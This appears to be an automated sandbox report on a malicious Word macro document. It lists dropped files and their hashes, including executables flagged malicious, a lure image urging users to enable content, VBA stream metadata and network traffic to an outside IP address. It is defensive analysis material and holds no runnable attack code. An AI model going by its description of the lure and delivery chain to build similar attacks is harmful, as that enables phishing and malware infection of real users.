        Preview:.PNG........IHDR.............7......sRGB.........gAMA......a.....pHYs..!...!..........IDATx^....nGU.39..........[..((.QPQD..)a...Z.m s..aHB...3........@....F.f......s..0&.}...{.^'.Vj.....U.V..].........8.-.g.."i.:c....>q..^Y.zm...2Zy...7e.,Kz"...t..@.;&....W.....3.._I...e...../.g......jy....^.D.W>P...?.-...t.1H...Z..|+#yj..*o.t.#c^9.<q.?A:C.....-.'...4.J...h.7BO^b.. ......^H...ytH}..3TT.J..Z...S..t.......6^F%.n..+.N.j..--.x.+OE[.W..@...V.. .-*./nQ.\.Z....A.^)..r0......-o.......@.......t^.P....<..-*O.....+O.3..k.....v.gH..^..ZP...q.1z...7..Uv..P..hIo.P..^>q(|5...=....{< .*...Z.<3.... ..!..Z.[.|.2...^Qy..F.D...5.h.eY..I..5.2zh..z..Hg...K..TZ..{.JO.h`..%.....Wz-.-....3$ZZ..hi.N....q...6...h...Y....1 ..........%....y.ZF:CE....5.uj.....+-Qi5.y4P.-r-.<c....vn..D..C....1.Hz.UIP.@.'.PPy.z.. ..*Q.-=..**O.+V...W.$O.-ZZ..Kgh....."e.._..=Tz....&OO.D..1.tPuLz.+=Qic<.Z.m.C.y.U....%..S.....Tz.g.E..[i..ec.W..jY.-j.<.1..mY....5N.<...2.KW. ...6...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:PNG image data, 410 x 568, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):61935
        Entropy (8bit):7.988218918927523
        Encrypted:false
        SSDEEP:1536:vFo53cC4vJ7Y8qgUmqhIIPI2MM+ikJU78DPaFx:vy53qv6nmII0I2ngJAEan
        MD5:4800E90C87A78932178C7D338BA32F43
        SHA1:8006244EDAFF9A31546A17FCF99CB61DA4F69417
        SHA-256:8CD11EB654C64C7315F7B2904D123532F7993FAF2F210B250C4C4D670200FF73
        SHA-512:58994BDC81FF937B05B307C161F852383DAA8504EA17522CD96CDE6EBF99E4992BA64DBEA532424AC16FBD8273999295DBBB74E48A77AAB2122C5701633DC7A3
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.......8......X.L.. .IDATx..}i..F.-..\r.E.l..u..3....L....^TR-.......DF...*I.e;i.:U.L&...pq.p.1.HD.Z.@.6.._cc..........>.n....2v..c.%...)..G.?|...>k...bf......c0.sy..$...a....<.......>".=X1.....1.^I|......|!.....I`E..c.#.T......'.'.....$6&L1.0.H...X&".cp.l...p.>..?.@?.1.Tp.....Y...=D.]....).w=...~..yp...{x/......d}1.G.h..b."1..-}.0x...O.......<. &n...0.1...eI...."".. ....C<t..A.H..4O.L.G....v...6Bd....W{..>..;W.....E.#<..s.^...Q...B.o.=l.lB{...1.ab.$D..:WB$O..V..>..k...y~.w".....A...-.D..;.I.4b.D..E".3...1...f....J.~xv.35G&&....?.acR...P.N....)...U.J....F.I...c$... .....a..z&...1..I...D...b.A4.......U.._.D.Z...E.6.G9t..=..qj...^L.$.;...>..S&dD.X... 1...0.{~.w..P.....1.U(.....j.PM......9J..[.O2...).12swy%.3..M?NGt_.......Z..........?F..+.....[4@.=.......;.".6..i.c..qH4...Ll...8.kI....="".!..h.g7.\'......Bb.A...f..o).+..`..++..?u..<.i.M..Gvs..@w.$.2X..'.[.h.8h.3..G.g.E...3..d.)..V*../$)...."%...F....~...s.1@|.....dE.8D|..d..........N.z..(...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):12288
        Entropy (8bit):5.683375190196064
        Encrypted:false
        SSDEEP:192:l1KtgbJDmX7JF93b2kDa5t66JDmX7JF93b2kDa:qtuJDmX1rL2kCtBJDmX1rL2k
        MD5:B3FD623B10C21C4D9E09B7C2ED46EC94
        SHA1:5559EBDBE5EFA2168603E0D45027BE8D6B786DFD
        SHA-256:22CDFE14057F98D3DAA54DAE160CAACD13A102B9DDEDF9A125B677BA47A9106E
        SHA-512:2E71D038117B22F890E1372CBBE5E4FB4F80826CA9DD9A99EA0ED8CBC3DABC85AE6D0E5E9BA5500D43A6A4934C05EB3CA516DECBFBCCA8F6F291E6C3F4E4F9FA
        Malicious:false
        Reputation:low
        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Reputation:high, very likely benign file
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1536
        Entropy (8bit):2.1363686128594344
        Encrypted:false
        SSDEEP:12:DMlzfRLZRW4WZ1MFKuQ9cc3xn82lI+kwkvdQ473W4wW4PllZWHkUZr8/W4c:4LG1ND9Pxn829k/Qq3W/WYbWHlJz
        MD5:FACB03470AEE19DAA10713FEC41483C1
        SHA1:A46E994A7888A44E3A580FF74E15001B3F502B86
        SHA-256:68FEED0A8607FD49B36FC442D519336DDD2FBCB229C4E7B2F221CD1A49F5662B
        SHA-512:9929AD4BA1CB5E7E898092390D8E4F12F23A072B85BD399C6EE40B1A9110BB3DA483299A6459264FDE4E1734E17ADA0AA921800BBF1F9BE351063DEFA922A64F
        Malicious:false
        Preview:.././...T.h.i.s. .d.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .p.r.e.v.i.o.u.s. .v.e.r.s.i.o.n. .o.f. .M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .W.o.r.d.....T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .. E.n.a.b.l.e. .e.d.i.t.i.n.g.. .b.u.t.t.o.n. .o.n. .t.h.e. .t.o.p. .b.a.r.,. .a.n.d. .t.h.e.n. .c.l.i.c.k. .. E.n.a.b.l.e. .c.o.n.t.e.n.t.. ..........................................................................................................................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):44544
        Entropy (8bit):6.056689486584974
        Encrypted:false
        SSDEEP:768:mD+ellQvZSazSRqbSEln5IyYpamDjobj8SpM:E+QWvZhSRqln5IUmDjoXV
        MD5:51138BEEA3E2C21EC44D0932C71762A8
        SHA1:8939CF35447B22DD2C6E6F443446ACC1BF986D58
        SHA-256:5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124
        SHA-512:794F30FE452117FF2A26DC9D7086AAF82B639C2632AC2E381A81F5239CAAEC7C96922BA5D2D90BFD8D74F0A6CD4F79FBDA63E14C6B779E5CF6834C13E4E45E7D
        Malicious:true
        Antivirus:
        • Antivirus: Metadefender, Detection: 0%, Browse
        • Antivirus: ReversingLabs, Detection: 0%
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V|.....,...,...,.eO,...,.eI,...,...,v..,.e^,...,.eY,...,.eN,...,.eK,...,Rich...,........PE..L...7.[J.................:...p...............P............................................@..................................@..x....`..`g......................P...<I..8...........................8&..@...p...l............@..@....................text....9.......:.................. ..`.data........P.......>..............@....rsrc...`g...`...h...B..............@..@.reloc..P...........................@..B..[J0.../.[J=...o.[JH.....[JS.....[J`...........KERNEL32.dll.USER32.dll.msvcrt.dll.imagehlp.dll.ntdll.dll...............................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
        Category:dropped
        Size (bytes):360448
        Entropy (8bit):4.669605444265748
        Encrypted:false
        SSDEEP:6144:4YCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:/CwMfjSlE+A4eguRJDtPZIG46FkEH9
        MD5:18CC94DD7BBBFF54DF547A4F47346F01
        SHA1:B13786283F076A3E95BEDF277C4AD5CCF74D407E
        SHA-256:2FFB609277439F8D2F4E2716C54F282030BA717A59234098F364205BCF37FE9C
        SHA-512:798FB93688E812ED1AC854B9B4CF93E2A5BD5A3602CFED7F266B64526480A2102527C310513726800F6390D47E3F37444C0B4E90945B92EA73A6FA13328E5B67
        Malicious:true
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3...Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x................................................................`.............................................}............................................................................................................................text....w.......x.................. ..`.rdata..}............|..............@..@.rsrc................~..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):60416
        Entropy (8bit):4.172593521527024
        Encrypted:false
        SSDEEP:768:jKnjb0tZxwWKaJF/rMjJ1dXCE1lpBL/XrfdRcoOMGeyIye2PGEaI:jqWx7KaH4F1dXzhBLjGEyeEGEaI
        MD5:59993E0E46B1E754351F61C0175A071F
        SHA1:E2698FA83715D154E1EBFF7EF9468A3C13D56A5B
        SHA-256:9B895731F67A932C3D6B53DD7BE9A9551E014D31BF06B169C91EE35718D998B2
        SHA-512:197FDD99D32C0911CA01C81E1AB3D9754D47B9FFF0AEEE785EC158040DC0EEB90CAC42E807B40E34499B2D341DCD3F4EBB0CB1DDDF4B5F7EA37247AA42B17863
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        Preview:......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...........(........................................................................................................... ...!..."...#...$...%...&...'.......)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:.......<...=...>...?...@...A...K...C...D...E...F...G...H...I...J...;...L...M...N...O...P...Q...R...S.......`...V...W...X...Y...Z...]...\.......i..._...........b...c...d...e...f...g...h...[...j...k...t...m...n...o...p...q...r...s...^...........................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Thu Aug 11 23:27:16 2022, length=2203466, window=hide
        Category:dropped
        Size (bytes):1109
        Entropy (8bit):4.556591519488816
        Encrypted:false
        SSDEEP:12:8TVY0gXg/XAlCPCHaXNBQtB/SxXX+WYuY5imY4icvbCG9zl4HADtZ3YilMMEpxRR:8T2k/XT9SUnZbemG9pDv3qz4u7D
        MD5:7A9803AED26CBF0DC1D0074F4B0C32E7
        SHA1:C8BD62532D903BAB96D22533D94866DE0CEF2A6F
        SHA-256:F17C3AEE491E43CDCE86091040DFC9FDBB4674562B8CF04ADF4BAAFFF0526182
        SHA-512:AFF93121D72DA96AF5CB2B7F42A2CCB23762EF94C9519BBC6FCD58B30373F4B1BA50A7F438F3727057890BED590D5168BA2C078AE22FB7939F7678E8DFB3505D
        Malicious:false
        Preview:L..................F.... ...<r...3..<r...3..Us.F...J.!..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.J.!..Ui. .DODSON~1.DOC..p......hT..hT..*...r.....'...............d.o.d.s.o.n.i.m.a.g.i.n.g.,.f.i.l.e.,.0.8...1.1...2.0.2.2...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\210979\Users.user\Desktop\dodsonimaging,file,08.11.2022.doc.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.d.s.o.n.i.m.a.g.i.n.g.,.f.i.l.e.,.0.8...1.1...2.0.2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):109
        Entropy (8bit):4.718136592074459
        Encrypted:false
        SSDEEP:3:bDuMJlZIMg9omX18g+Mg9ov:bCSxg9E2g9y
        MD5:E28869B9DCA55802DD912623F282F342
        SHA1:A79867AEBA6C3B64392ECE7EEA2A48E6F4988430
        SHA-256:EFAFE8B739A6D1A7DF19C01FBE30850246F58DC935DF400AA24EA7BEB62EC869
        SHA-512:0B360FECB904D52BD1B0EE6164A673190FF27E7761D369AC1E716955270F88CCD560B55A4BDB8B6EDD064B725E2DC5CC9AF9FB354D3F9CE0CFB2A3FCB263FBDA
        Malicious:false
        Preview:[folders]..Templates.LNK=0..dodsonimaging,file,08.11.2022.LNK=0..[doc]..dodsonimaging,file,08.11.2022.LNK=0..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.503835550707525
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
        MD5:7CFA404FD881AF8DF49EA584FE153C61
        SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
        SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
        SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Little-endian UTF-16 Unicode text, with no line terminators
        Category:dropped
        Size (bytes):2
        Entropy (8bit):1.0
        Encrypted:false
        SSDEEP:3:Qn:Qn
        MD5:F3B25701FE362EC84616A93A45CE9998
        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
        Malicious:false
        Preview:..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.503835550707525
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
        MD5:7CFA404FD881AF8DF49EA584FE153C61
        SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
        SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
        SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
        File type:Zip archive data, at least v2.0 to extract
        Entropy (8bit):7.99341108201784
        TrID:
        • Word Microsoft Office Open XML Format document (49504/1) 49.01%
        • Word Microsoft Office Open XML Format document (43504/1) 43.07%
        • ZIP compressed archive (8000/1) 7.92%
        File name:dodsonimaging,file,08.11.2022.doc
        File size:2298458
        MD5:db11828aed458eccfab30c367bc1bb2f
        SHA1:3487931f130485c82d21e9ef4155af0a8fd46c33
        SHA256:d297f78ca4fc35e899792260c98f752947f7d6b5999650a6210f4a8538a2e655
        SHA512:912a9d23b444a26ee176777d5be88c6a58a3cbf85864d3e09a3a497bcd3858764f8a9b318ddb8c314eb5e521a6a59ebcf88842cd3d7f9ed6f87ab7d192a12513
        SSDEEP:49152:RZQvsaxwME576XnfwHM3SSx+LwC01/BvObZ4Yf/KUoDG1J7:SxwfeXsGQwC4wByh25
        TLSH:CFB533442D61A68BE52F6234C6462265F4DD4AB303ACFDAE117DCF7E8359D36B0B01E8
        File Content Preview:PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........|.zs..z..z.*X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q..*.;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.
        Icon Hash:e4eea2aaa4b4b4a4
        Document Type:OpenXML
        Number of OLE Files:1
        Has Summary Info:
        Application Name:
        Encrypted Document:False
        Contains Word Document Stream:True
        Contains Workbook/Book Stream:False
        Contains PowerPoint Document Stream:False
        Contains Visio Document Stream:False
        Contains ObjectPool Stream:False
        Flash Objects Count:0
        Contains VBA Macros:True
        General
        Stream Path:VBA/ThisDocument
        VBA File Name:ThisDocument.cls
        Stream Size:2874
        Data ASCII:. . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t . i o n q . . . . . . . L i b " u s e . r 3 2 " A l i . a s " K i l l . T i m e r " ( B y V a l . . . ! . . . . A s L o n g . 3 , . . % . . .
        Data Raw:01 b0 b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54

        General
        Stream Path:PROJECT
        File Type:ASCII text, with CRLF line terminators
        Stream Size:357
        Entropy:5.294641930282945
        Base64 Encoded:True
        Data ASCII:I D = " { 4 E 2 6 9 6 0 2 - 6 6 5 D - 4 2 2 2 - B 7 8 C - 9 7 E 2 A 8 5 B 8 E C B } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 8 A A 7 2 8 0 7 6 8 0 7 6 8 0 7 6 8 0 7 6 " . . D P B = " 5 0 5 2 8 A 2 D 8 B 2 D 8 B 2 D " . . G C = " F 8 F A 2 2 D 5 2 3 D 5 2 3 2 A " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0 0 0 0 0
        Data Raw:49 44 3d 22 7b 34 45 32 36 39 36 30 32 2d 36 36 35 44 2d 34 32 32 32 2d 42 37 38 43 2d 39 37 45 32 41 38 35 42 38 45 43 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
        General
        Stream Path:PROJECTwm
        File Type:data
        Stream Size:41
        Entropy:3.0773844850752607
        Base64 Encoded:False
        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
        General
        Stream Path:VBA/_VBA_PROJECT
        File Type:ISO-8859 text, with no line terminators
        Stream Size:7
        Entropy:1.8423709931771088
        Base64 Encoded:False
        Data ASCII:a . . .
        Data Raw:cc 61 ff ff 00 00 00
        General
        Stream Path:VBA/__SRP_2
        File Type:data
        Stream Size:5116
        Entropy:1.9333763372676134
        Base64 Encoded:False
        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
        General
        Stream Path:VBA/__SRP_3
        File Type:data
        Stream Size:2724
        Entropy:2.697647710097881
        Base64 Encoded:False
        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . P . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . ` . q . . . . . . . . . . . , . . p . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . ` . ! . . . . . . . . . . . \\ . . p . . . . . . A . . . . . . . . . . . . . . . . . . . .
        Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 50 00 d1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 08 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
        General
        Stream Path:VBA/dir
        File Type:data
        Stream Size:486
        Entropy:6.299483290874555
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . N G d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . L m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A
        Data Raw:01 e2 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 4e 47 f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30
        TimestampSource PortDest PortSource IPDest IP
        Aug 11, 2022 17:27:53.037703037 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.141216040 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.141383886 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.142085075 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.245167971 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.262594938 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.262634039 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.262659073 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.262682915 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.262706995 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.262732029 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.262754917 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.262779951 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.262784958 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.262804031 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.262805939 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.262818098 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.262897015 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.262922049 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.262933016 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.267369986 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366070986 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366111994 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366137028 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366161108 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366183996 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366206884 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366210938 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366225958 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366230965 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366250992 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366266966 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366282940 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366290092 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366295099 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366311073 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366313934 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366327047 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366337061 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366345882 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366362095 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366385937 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366391897 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366408110 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366410017 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366424084 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366431952 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366442919 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366453886 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366463900 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366478920 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366492987 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366501093 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366511106 CEST4917180192.168.2.2245.8.146.139
        Aug 11, 2022 17:27:53.366523981 CEST804917145.8.146.139192.168.2.22
        Aug 11, 2022 17:27:53.366528034 CEST4917180192.168.2.2245.8.146.139
